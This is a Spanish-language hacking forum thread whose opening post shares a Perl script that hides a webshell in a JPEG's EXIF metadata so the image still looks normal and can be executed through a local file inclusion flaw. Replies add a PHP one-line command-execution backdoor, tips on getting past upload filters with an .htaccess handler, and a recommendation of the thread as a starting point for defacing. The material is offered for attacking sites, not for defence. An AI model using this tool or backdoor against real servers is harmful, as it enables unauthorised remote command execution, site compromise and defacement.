LFI: Inyector de Webshells en imágenes

Iniciado por Mavis, Julio 17, 2011, 07:54:53 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 17, 2011, 07:54:53 PM Ultima modificación: Agosto 16, 2014, 10:35:24 AM por Expermicid
Código: perl
####################################################
#          0verLFI v0.2 Coded by The X-C3LL        #       
####################################################
#  Se trata de una herramienta bastante sencilla   #
#  para inyectar una shell en una imagen JPEG      #
#  y que esta siga pudiendo ser visualizada        #
#  correctamente, de esta forma nadie sospecha.    #
#  Lo único que hace es meter la shell dentro      #
#  de los metadatos de la foto.                    #
####################################################
#             Gr33tz to Seth & CPH Comunity        #
####################################################
#          HTTP://0VERL0AD.BLOGSPOT.COM            #
####################################################



use Image::ExifTool;

print q(

+-----------------------------------+
   0verLFI v0.1 coded by The X-C3LL 

    Http://0verl0ad.blogspot.com 
+-----------------------------------+

);

die "[-]Usage: perl 0verLFI.pl <FILE> <IMAGE>\n" unless @ARGV == 2;

my $file = $ARGV[0];
my $jpeg = $ARGV[1];
print "[+]Image = $jpeg \n";
print "[+]Shell = $file \n";

open (HANDLE, $file);
@array = <HANDLE>;
my $string = join("\n", @array);


my $tool = Image::ExifTool->new();

$tool->ExtractInfo($jpeg);
$tool->SetNewValue("Model", $string);
$done = $tool->WriteInfo($jpeg);


Simplemente tienen que pasar la imagen a inyectar como argumento:



Como podeis comprobar, tras modificar los metadatos la imagen continúa viendose perfectamente:



Y si lo testeamos en un entorno local vulnerable veremos que funciona:





Autor: The X-C3LL
Fuente: Foro Portal Hacker

Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?> 

te lo recomiendo .. el mejor texto para empezar con el defacing ... saludos

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?>

exactamente eso mismo es una jpg inclusion, para bypasear uploads no serviria porq lo ejecutaria como jpg. necesitarias un .htaccess con addhandler para que lo ejecutara en otra extension , el autor deberia de poner que sin un file include esto no sirve de nada.

Es lo mismo q usar Cat Shell.txt >> Image.jpg

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

disculpa mi ignorancia pero como le ago para meter meta-datos a una imagen ._.
o como se usa esto?

lo yamo desde un archivo externo o meto directamente el codigo en los meta-datos?